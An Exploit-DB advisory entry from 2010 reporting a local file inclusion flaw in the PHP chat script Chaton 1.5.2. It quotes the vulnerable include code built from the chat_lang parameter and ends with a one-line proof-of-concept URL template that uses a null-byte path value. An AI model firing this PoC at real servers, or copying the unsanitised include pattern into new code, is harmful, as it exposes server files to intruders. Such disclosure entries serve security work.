Chaton <= 1.5.2 - Local File Include Vulnerability

2010-03-08T00:00:00
ID EDB-ID:11657
Type exploitdb
Reporter cr4wl3r
Modified 2010-03-08T00:00:00

Description

Chaton <= 1.5.2 Local File Include Vulnerability. Webapps exploit for php platform

                                        
                                            [+] Chaton &lt;= 1.5.2 Local File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend

[+] Code:

    if (file_exists( "lang/$chat_lang/deplacer.php")) {
        include( "lang/$chat_lang/deplacer.php");
    }

    if ($chat_salon != $newsalon) {
        if ($chat_hide == false) {
            // Salle publique = Recupere le vrai nom
            $nomsalle = NomSalonPublic( $newsalon);
            if ($nomsalle == '') {
                // Salon privďż˝
                $salon_prive = true;
                $nomsalle = $newsalon;
            } else {
                $salon_prive = false;
            }

[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]